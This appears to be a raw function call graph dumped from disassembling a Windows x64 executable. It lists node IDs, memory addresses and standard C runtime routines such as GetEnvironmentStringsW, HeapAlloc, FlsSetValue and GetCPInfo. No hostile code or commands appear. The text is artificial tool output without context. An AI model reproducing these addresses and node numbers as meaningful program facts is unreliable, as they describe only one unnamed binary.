7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16594->16595 16597 7ff6dc720eca 16595->16597 16601 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16597->16601 16599 7ff6dc720f6f 16604 7ff6dc71a900 _isindst 17 API calls 16599->16604 16600 7ff6dc720ee2 SetEnvironmentVariableW 16602 7ff6dc720f27 16600->16602 16603 7ff6dc720f06 16600->16603 16601->16572 16605 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16602->16605 16606 7ff6dc714f08 _set_fmode 11 API calls 16603->16606 16607 7ff6dc720f83 16604->16607 16605->16587 16608 7ff6dc720f0b 16606->16608 16609 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16608->16609 16609->16597 16611 7ff6dc71a4b1 16610->16611 16613 7ff6dc71a4bb 16610->16613 16611->16613 16617 7ff6dc71a4d6 16611->16617 16612 7ff6dc714f08 _set_fmode 11 API calls 16614 7ff6dc71a4c2 16612->16614 16613->16612 16615 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16614->16615 16616 7ff6dc71a4ce 16615->16616 16616->16533 16616->16534 16617->16616 16618 7ff6dc714f08 _set_fmode 11 API calls 16617->16618 16618->16614 16620 7ff6dc72048b 16619->16620 16621 7ff6dc720481 16619->16621 16622 7ff6dc714f08 _set_fmode 11 API calls 16620->16622 16621->16620 16625 7ff6dc7204a7 16621->16625 16627 7ff6dc720493 16622->16627 16623 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16624 7ff6dc72049f 16623->16624 16624->16599 16624->16600 16625->16624 16626 7ff6dc714f08 _set_fmode 11 API calls 16625->16626 16626->16627 16627->16623 16629 7ff6dc720fb9 16628->16629 16630 7ff6dc720fa1 16628->16630 16631 7ff6dc71eb98 _set_fmode 11 API calls 16629->16631 16630->16487 16636 7ff6dc720fdd 16631->16636 16632 7ff6dc72103e 16635 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16632->16635 16633 7ff6dc71a504 __CxxCallCatchBlock 45 API calls 16634 7ff6dc721068 16633->16634 16635->16630 16636->16632 16637 7ff6dc71eb98 _set_fmode 11 API calls 16636->16637 16638 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16636->16638 16639 7ff6dc71a4a4 __std_exception_copy 37 API calls 16636->16639 16640 7ff6dc72104d 16636->16640 16642 7ff6dc721062 16636->16642 16637->16636 16638->16636 16639->16636 16641 7ff6dc71a900 _isindst 17 API calls 16640->16641 16641->16642 16642->16633 16644 7ff6dc7196d0 16643->16644 16645 7ff6dc7196d9 16643->16645 16644->16645 16758 7ff6dc719198 16644->16758 16645->16501 16645->16502 16650 7ff6dc727139 16649->16650 16651 7ff6dc726254 16649->16651 16654 7ff6dc714f4c 45 API calls 16650->16654 16652 7ff6dc726297 16651->16652 16653 7ff6dc726261 16651->16653 16656 7ff6dc7262c1 16652->16656 16664 7ff6dc7262e6 16652->16664 16655 7ff6dc714f08 _set_fmode 11 API calls 16653->16655 16672 7ff6dc726208 16653->16672 16659 7ff6dc72716d 16654->16659 16657 7ff6dc72626b 16655->16657 16658 7ff6dc714f08 _set_fmode 11 API calls 16656->16658 16662 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16657->16662 16663 7ff6dc7262c6 16658->16663 16660 7ff6dc727172 16659->16660 16661 7ff6dc727183 16659->16661 16665 7ff6dc72719a 16659->16665 16660->16506 16666 7ff6dc714f08 _set_fmode 11 API calls 16661->16666 16667 7ff6dc726276 16662->16667 16668 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16663->16668 16673 7ff6dc714f4c 45 API calls 16664->16673 16678 7ff6dc7262d1 16664->16678 16670 7ff6dc7271b6 16665->16670 16671 7ff6dc7271a4 16665->16671 16669 7ff6dc727188 16666->16669 16667->16506 16668->16678 16674 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16669->16674 16676 7ff6dc7271c7 16670->16676 16677 7ff6dc7271de 16670->16677 16675 7ff6dc714f08 _set_fmode 11 API calls 16671->16675 16672->16506 16673->16678 16674->16660 16680 7ff6dc7271a9 16675->16680 17019 7ff6dc7262a4 16676->17019 17028 7ff6dc728f4c 16677->17028 16678->16506 16683 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16680->16683 16683->16660 16684 7ff6dc714f08 _set_fmode 11 API calls 16684->16660 16686 7ff6dc72341b 16685->16686 16687 7ff6dc7233fe 16685->16687 16689 7ff6dc723425 16686->16689 17068 7ff6dc727c38 16686->17068 16687->16686 16688 7ff6dc72340c 16687->16688 16690 7ff6dc714f08 _set_fmode 11 API calls 16688->16690 17075 7ff6dc727c74 16689->17075 16693 7ff6dc723411 __scrt_get_show_window_mode 16690->16693 16693->16522 16695 7ff6dc714f4c 45 API calls 16694->16695 16696 7ff6dc7272aa 16695->16696 16699 7ff6dc7272b8 16696->16699 17087 7ff6dc71ef24 16696->17087 17090 7ff6dc7154ac 16699->17090 16701 7ff6dc7273a4 16703 7ff6dc7273b5 16701->16703 16705 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16701->16705 16702 7ff6dc714f4c 45 API calls 16704 7ff6dc727327 16702->16704 16706 7ff6dc720ba3 16703->16706 16708 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16703->16708 16707 7ff6dc71ef24 5 API calls 16704->16707 16709 7ff6dc727330 16704->16709 16705->16703 16706->16541 16706->16542 16707->16709 16708->16706 16710 7ff6dc7154ac 14 API calls 16709->16710 16711 7ff6dc72738b 16710->16711 16711->16701 16712 7ff6dc727393 SetEnvironmentVariableW 16711->16712 16712->16701 16714 7ff6dc7210ac 16713->16714 16715 7ff6dc72108f 16713->16715 16716 7ff6dc71eb98 _set_fmode 11 API calls 16714->16716 16715->16552 16722 7ff6dc7210d0 16716->16722 16717 7ff6dc721131 16720 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16717->16720 16718 7ff6dc71a504 __CxxCallCatchBlock 45 API calls 16719 7ff6dc72115a 16718->16719 16720->16715 16721 7ff6dc71eb98 _set_fmode 11 API calls 16721->16722 16722->16717 16722->16721 16723 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16722->16723 16724 7ff6dc720474 37 API calls 16722->16724 16725 7ff6dc721140 16722->16725 16727 7ff6dc721154 16722->16727 16723->16722 16724->16722 16726 7ff6dc71a900 _isindst 17 API calls 16725->16726 16726->16727 16727->16718 16729 7ff6dc71970c 16728->16729 16730 7ff6dc719715 16728->16730 16729->16730 17112 7ff6dc71920c 16729->17112 16730->16568 16730->16569 16735 7ff6dc726ff9 16734->16735 16739 7ff6dc727026 16734->16739 16736 7ff6dc726ffe 16735->16736 16735->16739 16737 7ff6dc714f08 _set_fmode 11 API calls 16736->16737 16740 7ff6dc727003 16737->16740 16738 7ff6dc72706a 16741 7ff6dc714f08 _set_fmode 11 API calls 16738->16741 16739->16738 16742 7ff6dc727089 16739->16742 16756 7ff6dc72705e __crtLCMapStringW 16739->16756 16743 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16740->16743 16744 7ff6dc72706f 16741->16744 16745 7ff6dc727093 16742->16745 16746 7ff6dc7270a5 16742->16746 16747 7ff6dc72700e 16743->16747 16750 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16744->16750 16748 7ff6dc714f08 _set_fmode 11 API calls 16745->16748 16749 7ff6dc714f4c 45 API calls 16746->16749 16747->16565 16751 7ff6dc727098 16748->16751 16753 7ff6dc7270b2 16749->16753 16750->16756 16752 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 16751->16752 16752->16756 16753->16756 17159 7ff6dc728b08 16753->17159 16756->16565 16757 7ff6dc714f08 _set_fmode 11 API calls 16757->16756 16759 7ff6dc7191b1 16758->16759 16768 7ff6dc7191ad 16758->16768 16781 7ff6dc7225f0 16759->16781 16764 7ff6dc7191cf 16807 7ff6dc71927c 16764->16807 16765 7ff6dc7191c3 16766 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16765->16766 16766->16768 16768->16645 16773 7ff6dc7194ec 16768->16773 16770 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16771 7ff6dc7191f6 16770->16771 16772 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16771->16772 16772->16768 16774 7ff6dc719515 16773->16774 16779 7ff6dc71952e 16773->16779 16774->16645 16775 7ff6dc71eb98 _set_fmode 11 API calls 16775->16779 16776 7ff6dc7195be 16778 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16776->16778 16777 7ff6dc7207e8 WideCharToMultiByte 16777->16779 16778->16774 16779->16774 16779->16775 16779->16776 16779->16777 16780 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16779->16780 16780->16779 16782 7ff6dc7191b6 16781->16782 16783 7ff6dc7225fd 16781->16783 16787 7ff6dc72292c GetEnvironmentStringsW 16782->16787 16826 7ff6dc71b224 16783->16826 16788 7ff6dc72295c 16787->16788 16789 7ff6dc7191bb 16787->16789 16790 7ff6dc7207e8 WideCharToMultiByte 16788->16790 16789->16764 16789->16765 16791 7ff6dc7229ad 16790->16791 16792 7ff6dc7229b4 FreeEnvironmentStringsW 16791->16792 16793 7ff6dc71d5fc _fread_nolock 12 API calls 16791->16793 16792->16789 16794 7ff6dc7229c7 16793->16794 16795 7ff6dc7229d8 16794->16795 16796 7ff6dc7229cf 16794->16796 16798 7ff6dc7207e8 WideCharToMultiByte 16795->16798 16797 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16796->16797 16800 7ff6dc7229d6 16797->16800 16799 7ff6dc7229fb 16798->16799 16801 7ff6dc722a09 16799->16801 16802 7ff6dc7229ff 16799->16802 16800->16792 16804 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16801->16804 16803 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16802->16803 16805 7ff6dc722a07 FreeEnvironmentStringsW 16803->16805 16804->16805 16805->16789 16808 7ff6dc7192a1 16807->16808 16809 7ff6dc71eb98 _set_fmode 11 API calls 16808->16809 16822 7ff6dc7192d7 16809->16822 16810 7ff6dc7192df 16811 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16810->16811 16812 7ff6dc7191d7 16811->16812 16812->16770 16813 7ff6dc719352 16814 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16813->16814 16814->16812 16815 7ff6dc71eb98 _set_fmode 11 API calls 16815->16822 16816 7ff6dc719341 17013 7ff6dc7194a8 16816->17013 16818 7ff6dc71a4a4 __std_exception_copy 37 API calls 16818->16822 16820 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16820->16810 16821 7ff6dc719377 16823 7ff6dc71a900 _isindst 17 API calls 16821->16823 16822->16810 16822->16813 16822->16815 16822->16816 16822->16818 16822->16821 16824 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16822->16824 16825 7ff6dc71938a 16823->16825 16824->16822 16827 7ff6dc71b250 FlsSetValue 16826->16827 16828 7ff6dc71b235 FlsGetValue 16826->16828 16830 7ff6dc71b242 16827->16830 16831 7ff6dc71b25d 16827->16831 16829 7ff6dc71b24a 16828->16829 16828->16830 16829->16827 16832 7ff6dc71b248 16830->16832 16833 7ff6dc71a504 __CxxCallCatchBlock 45 API calls 16830->16833 16834 7ff6dc71eb98 _set_fmode 11 API calls 16831->16834 16846 7ff6dc7222c4 16832->16846 16835 7ff6dc71b2c5 16833->16835 16836 7ff6dc71b26c 16834->16836 16837 7ff6dc71b28a FlsSetValue 16836->16837 16838 7ff6dc71b27a FlsSetValue 16836->16838 16840 7ff6dc71b296 FlsSetValue 16837->16840 16841 7ff6dc71b2a8 16837->16841 16839 7ff6dc71b283 16838->16839 16842 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16839->16842 16840->16839 16843 7ff6dc71aef4 _set_fmode 11 API calls 16841->16843 16842->16830 16844 7ff6dc71b2b0 16843->16844 16845 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16844->16845 16845->16832 16869 7ff6dc722534 16846->16869 16848 7ff6dc7222f9 16884 7ff6dc721fc4 16848->16884 16853 7ff6dc72232f 16854 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16853->16854 16868 7ff6dc722316 16854->16868 16855 7ff6dc72233e 16855->16855 16898 7ff6dc72266c 16855->16898 16858 7ff6dc72243a 16859 7ff6dc714f08 _set_fmode 11 API calls 16858->16859 16860 7ff6dc72243f 16859->16860 16863 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16860->16863 16861 7ff6dc722495 16862 7ff6dc7224fc 16861->16862 16909 7ff6dc721df4 16861->16909 16867 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16862->16867 16863->16868 16864 7ff6dc722454 16864->16861 16865 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16864->16865 16865->16861 16867->16868 16868->16782 16870 7ff6dc722557 16869->16870 16871 7ff6dc722561 16870->16871 16924 7ff6dc7202d8 EnterCriticalSection 16870->16924 16874 7ff6dc7225d3 16871->16874 16877 7ff6dc71a504 __CxxCallCatchBlock 45 API calls 16871->16877 16874->16848 16878 7ff6dc7225eb 16877->16878 16879 7ff6dc722642 16878->16879 16881 7ff6dc71b224 50 API calls 16878->16881 16879->16848 16882 7ff6dc72262c 16881->16882 16883 7ff6dc7222c4 65 API calls 16882->16883 16883->16879 16885 7ff6dc714f4c 45 API calls 16884->16885 16886 7ff6dc721fd8 16885->16886 16887 7ff6dc721ff6 16886->16887 16888 7ff6dc721fe4 GetOEMCP 16886->16888 16889 7ff6dc721ffb GetACP 16887->16889 16890 7ff6dc72200b 16887->16890 16888->16890 16889->16890 16890->16868 16891 7ff6dc71d5fc 16890->16891 16892 7ff6dc71d647 16891->16892 16896 7ff6dc71d60b _set_fmode 16891->16896 16893 7ff6dc714f08 _set_fmode 11 API calls 16892->16893 16895 7ff6dc71d645 16893->16895 16894 7ff6dc71d62e HeapAlloc 16894->16895 16894->16896 16895->16853 16895->16855 16896->16892 16896->16894 16897 7ff6dc723590 _set_fmode 2 API calls 16896->16897 16897->16896 16899 7ff6dc721fc4 47 API calls 16898->16899 16900 7ff6dc722699 16899->16900 16901 7ff6dc7227ef 16900->16901 16903 7ff6dc7226d6 IsValidCodePage 16900->16903 16908 7ff6dc7226f0 __scrt_get_show_window_mode 16900->16908 16902 7ff6dc70c550 _log10_special 8 API calls 16901->16902 16904 7ff6dc722431 16902->16904 16903->16901 16905 7ff6dc7226e7 16903->16905 16904->16858 16904->16864 16906 7ff6dc722716 GetCPInfo 16905->16906 16905->16908 16906->16901 16906->16908 16925 7ff6dc7220dc 16908->16925 17012 7ff6dc7202d8 EnterCriticalSection 16909->17012 16926 7ff6dc722119 GetCPInfo 16925->16926 16927 7ff6dc72220f 16925->16927 16926->16927 16933 7ff6dc72212c 16926->16933 16928 7ff6dc70c550 _log10_special 8 API calls 16927->16928 16930 7ff6dc7222ae 16928->16930 16930->16901 16936 7ff6dc722e40 16933->16936 16937 7ff6dc714f4c 45 API calls 16936->16937 16938 7ff6dc722e82 16937->16938 16956 7ff6dc71f8a0 16938->16956 16957 7ff6dc71f8a9 MultiByteToWideChar 16956->16957 17015 7ff6dc7194ad 17013->17015 17018 7ff6dc719349 17013->17018 17014 7ff6dc7194d6 17017 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17014->17017 17015->17014 17016 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17015->17016 17016->17015 17017->17018 17018->16820 17020 7ff6dc7262d8 17019->17020 17021 7ff6dc7262c1 17019->17021 17020->17021 17024 7ff6dc7262e6 17020->17024 17022 7ff6dc714f08 _set_fmode 11 API calls 17021->17022 17023 7ff6dc7262c6 17022->17023 17025 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 17023->17025 17026 7ff6dc714f4c 45 API calls 17024->17026 17027 7ff6dc7262d1 17024->17027 17025->17027 17026->17027 17027->16660 17029 7ff6dc714f4c 45 API calls 17028->17029 17030 7ff6dc728f71 17029->17030 17033 7ff6dc728bc8 17030->17033 17036 7ff6dc728c16 17033->17036 17034 7ff6dc70c550 _log10_special 8 API calls 17035 7ff6dc727205 17034->17035 17035->16660 17035->16684 17037 7ff6dc728c9d 17036->17037 17039 7ff6dc728c88 GetCPInfo 17036->17039 17042 7ff6dc728ca1 17036->17042 17038 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17037->17038 17037->17042 17040 7ff6dc728d35 17038->17040 17039->17037 17039->17042 17041 7ff6dc71d5fc _fread_nolock 12 API calls 17040->17041 17040->17042 17043 7ff6dc728d6c 17040->17043 17041->17043 17042->17034 17043->17042 17044 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17043->17044 17045 7ff6dc728dda 17044->17045 17046 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17045->17046 17056 7ff6dc728ebc 17045->17056 17047 7ff6dc728e00 17046->17047 17049 7ff6dc71d5fc _fread_nolock 12 API calls 17047->17049 17050 7ff6dc728e2d 17047->17050 17047->17056 17048 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17048->17042 17049->17050 17051 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17050->17051 17050->17056 17052 7ff6dc728ea4 17051->17052 17053 7ff6dc728eaa 17052->17053 17054 7ff6dc728ec4 17052->17054 17053->17056 17057 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17053->17057 17062 7ff6dc71ef68 17054->17062 17056->17042 17056->17048 17057->17056 17059 7ff6dc728f03 17059->17042 17061 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17059->17061 17060 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17060->17059 17061->17042 17063 7ff6dc71ed10 __crtLCMapStringW 5 API calls 17062->17063 17064 7ff6dc71efa6 17063->17064 17065 7ff6dc71efae 17064->17065 17066 7ff6dc71f1d0 __crtLCMapStringW 5 API calls 17064->17066 17065->17059 17065->17060 17067 7ff6dc71f017 CompareStringW 17066->17067 17067->17065 17069 7ff6dc727c5a HeapSize 17068->17069 17070 7ff6dc727c41 17068->17070 17071 7ff6dc714f08 _set_fmode 11 API calls 17070->17071 17072 7ff6dc727c46 17071->17072 17073 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 17072->17073 17074 7ff6dc727c51 17073->17074 17074->16689 17076 7ff6dc727c89 17075->17076 17077 7ff6dc727c93 17075->17077 17078 7ff6dc71d5fc _fread_nolock 12 API calls 17076->17078 17079 7ff6dc727c98 17077->17079 17085 7ff6dc727c9f _set_fmode 17077->17085 17084 7ff6dc727c91 17078->17084 17082 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17079->17082 17080 7ff6dc727cd2 HeapReAlloc 17080->17084 17080->17085 17081 7ff6dc727ca5 17083 7ff6dc714f08 _set_fmode 11 API calls 17081->17083 17082->17084 17083->17084 17084->16693 17085->17080 17085->17081 17086 7ff6dc723590 _set_fmode 2 API calls 17085->17086 17086->17085 17088 7ff6dc71ed10 __crtLCMapStringW 5 API calls 17087->17088 17089 7ff6dc71ef44 17088->17089 17089->16699 17091 7ff6dc7154d6 17090->17091 17092 7ff6dc7154fa 17090->17092 17095 7ff6dc7154e5 17091->17095 17097 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17091->17097 17093 7ff6dc7154ff 17092->17093 17094 7ff6dc715554 17092->17094 17093->17095 17098 7ff6dc715514 17093->17098 17100 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17093->17100 17096 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17094->17096 17095->16701 17095->16702 17099 7ff6dc715570 17096->17099 17097->17095 17101 7ff6dc71d5fc _fread_nolock 12 API calls 17098->17101 17102 7ff6dc715577 GetLastError 17099->17102 17105 7ff6dc7155a5 17099->17105 17108 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17099->17108 17111 7ff6dc7155b2 17099->17111 17100->17098 17101->17095 17103 7ff6dc714e7c _fread_nolock 11 API calls 17102->17103 17104 7ff6dc715584 17103->17104 17107 7ff6dc714f08 _set_fmode 11 API calls 17104->17107 17109 7ff6dc71d5fc _fread_nolock 12 API calls 17105->17109 17106 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17110 7ff6dc7155f6 17106->17110 17107->17095 17108->17105 17109->17111 17110->17095 17110->17102 17111->17095 17111->17106 17113 7ff6dc719221 17112->17113 17114 7ff6dc719225 17112->17114 17113->16730 17125 7ff6dc7195cc 17113->17125 17133 7ff6dc722a3c GetEnvironmentStringsW 17114->17133 17117 7ff6dc71923e 17140 7ff6dc71938c 17117->17140 17118 7ff6dc719232 17119 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17118->17119 17119->17113 17122 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17123 7ff6dc719265 17122->17123 17124 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17123->17124 17124->17113 17126 7ff6dc7195ef 17125->17126 17129 7ff6dc719606 17125->17129 17126->16730 17127 7ff6dc71f8a0 MultiByteToWideChar _fread_nolock 17127->17129 17128 7ff6dc71eb98 _set_fmode 11 API calls 17128->17129 17129->17126 17129->17127 17129->17128 17130 7ff6dc71967a 17129->17130 17132 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17129->17132 17131 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17130->17131 17131->17126 17132->17129 17134 7ff6dc722a60 17133->17134 17135 7ff6dc71922a 17133->17135 17136 7ff6dc71d5fc _fread_nolock 12 API calls 17134->17136 17135->17117 17135->17118 17138 7ff6dc722a97 memcpy_s 17136->17138 17137 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17139 7ff6dc722ab7 FreeEnvironmentStringsW 17137->17139 17138->17137 17139->17135 17141 7ff6dc7193b4 17140->17141 17142 7ff6dc71eb98 _set_fmode 11 API calls 17141->17142 17153 7ff6dc7193ef 17142->17153 17143 7ff6dc7193f7 17144 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17143->17144 17145 7ff6dc719246 17144->17145 17145->17122 17146 7ff6dc719471 17147 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17146->17147 17147->17145 17148 7ff6dc71eb98 _set_fmode 11 API calls 17148->17153 17149 7ff6dc719460 17151 7ff6dc7194a8 11 API calls 17149->17151 17150 7ff6dc720474 37 API calls 17150->17153 17152 7ff6dc719468 17151->17152 17155 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17152->17155 17153->17143 17153->17146 17153->17148 17153->17149 17153->17150 17154 7ff6dc719494 17153->17154 17157 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17153->17157 17156 7ff6dc71a900 _isindst 17 API calls 17154->17156 17155->17143 17158 7ff6dc7194a6 17156->17158 17157->17153 17160 7ff6dc728b31 __crtLCMapStringW 17159->17160 17161 7ff6dc7270ee 17160->17161 17162 7ff6dc71ef68 6 API calls 17160->17162 17161->16756 17161->16757 17162->17161 19856 7ff6dc70cb50 19857 7ff6dc70cb60 19856->19857 19873 7ff6dc719ba8 19857->19873 19859 7ff6dc70cb6c 19879 7ff6dc70ce48 19859->19879 19861 7ff6dc70d12c 7 API calls 19863 7ff6dc70cc05 19861->19863 19862 7ff6dc70cb84 _RTC_Initialize 19871 7ff6dc70cbd9 19862->19871 19884 7ff6dc70cff8 19862->19884 19865 7ff6dc70cb99 19887 7ff6dc719014 19865->19887 19871->19861 19872 7ff6dc70cbf5 19871->19872 19874 7ff6dc719bb9 19873->19874 19875 7ff6dc719bc1 19874->19875 19876 7ff6dc714f08 _set_fmode 11 API calls 19874->19876 19875->19859 19877 7ff6dc719bd0 19876->19877 19878 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 19877->19878 19878->19875 19880 7ff6dc70ce59 19879->19880 19883 7ff6dc70ce5e __scrt_acquire_startup_lock 19879->19883 19881 7ff6dc70d12c 7 API calls 19880->19881 19880->19883 19882 7ff6dc70ced2 19881->19882 19883->19862 19912 7ff6dc70cfbc 19884->19912 19886 7ff6dc70d001 19886->19865 19888 7ff6dc719034 19887->19888 19902 7ff6dc70cba5 19887->19902 19889 7ff6dc71903c 19888->19889 19890 7ff6dc719052 GetModuleFileNameW 19888->19890 19891 7ff6dc714f08 _set_fmode 11 API calls 19889->19891 19894 7ff6dc71907d 19890->19894 19892 7ff6dc719041 19891->19892 19893 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 19892->19893 19893->19902 19927 7ff6dc718fb4 19894->19927 19897 7ff6dc7190c5 19898 7ff6dc714f08 _set_fmode 11 API calls 19897->19898 19899 7ff6dc7190ca 19898->19899 19900 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19899->19900 19900->19902 19901 7ff6dc7190dd 19904 7ff6dc71912b 19901->19904 19905 7ff6dc719144 19901->19905 19910 7ff6dc7190ff 19901->19910 19902->19871 19911 7ff6dc70d0cc InitializeSListHead 19902->19911 19903 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19903->19902 19906 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19904->19906 19908 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19905->19908 19907 7ff6dc719134 19906->19907 19909 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19907->19909 19908->19910 19909->19902 19910->19903 19913 7ff6dc70cfd6 19912->19913 19915 7ff6dc70cfcf 19912->19915 19916 7ff6dc71a1ec 19913->19916 19915->19886 19919 7ff6dc719e28 19916->19919 19926 7ff6dc7202d8 EnterCriticalSection 19919->19926 19928 7ff6dc719004 19927->19928 19929 7ff6dc718fcc 19927->19929 19928->19897 19928->19901 19929->19928 19930 7ff6dc71eb98 _set_fmode 11 API calls 19929->19930 19931 7ff6dc718ffa 19930->19931 19932 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19931->19932 19932->19928 19714 7ff6dc71afd0 19715 7ff6dc71afd5 19714->19715 19719 7ff6dc71afea 19714->19719 19720 7ff6dc71aff0 19715->19720 19721 7ff6dc71b03a 19720->19721 19722 7ff6dc71b032 19720->19722 19723 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19721->19723 19724 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19722->19724 19725 7ff6dc71b047 19723->19725 19724->19721 19726 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19725->19726 19727 7ff6dc71b054 19726->19727 19728 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19727->19728 19729 7ff6dc71b061 19728->19729 19730 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19729->19730 19731 7ff6dc71b06e 19730->19731 19732 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19731->19732 19733 7ff6dc71b07b 19732->19733 19734 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19733->19734 19735 7ff6dc71b088 19734->19735 19736 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19735->19736 19737 7ff6dc71b095 19736->19737 19738 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19737->19738 19739 7ff6dc71b0a5 19738->19739 19740 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19739->19740 19741 7ff6dc71b0b5 19740->19741 19746 7ff6dc71ae94 19741->19746 19760 7ff6dc7202d8 EnterCriticalSection 19746->19760 19936 7ff6dc719d50 19939 7ff6dc719ccc 19936->19939 19946 7ff6dc7202d8 EnterCriticalSection 19939->19946 19594 7ff6dc719961 19595 7ff6dc71a3d8 45 API calls 19594->19595 19596 7ff6dc719966 19595->19596 19597 7ff6dc7199d7 19596->19597 19598 7ff6dc71998d GetModuleHandleW 19596->19598 19606 7ff6dc719864 19597->19606 19598->19597 19604 7ff6dc71999a 19598->19604 19604->19597 19620 7ff6dc719a88 GetModuleHandleExW 19604->19620 19626 7ff6dc7202d8 EnterCriticalSection 19606->19626 19621 7ff6dc719abc GetProcAddress 19620->19621 19622 7ff6dc719ae5 19620->19622 19623 7ff6dc719ace 19621->19623 19624 7ff6dc719aea FreeLibrary 19622->19624 19625 7ff6dc719af1 19622->19625 19623->19622 19624->19625 19625->19597 19637 7ff6dc70bae0 19638 7ff6dc70bb0e 19637->19638 19639 7ff6dc70baf5 19637->19639 19639->19638 19641 7ff6dc71d5fc 12 API calls 19639->19641 19640 7ff6dc70bb6e 19641->19640 19762 7ff6dc72abe3 19763 7ff6dc72abf3 19762->19763 19766 7ff6dc715478 LeaveCriticalSection 19763->19766 19977 7ff6dc72ad69 19980 7ff6dc715478 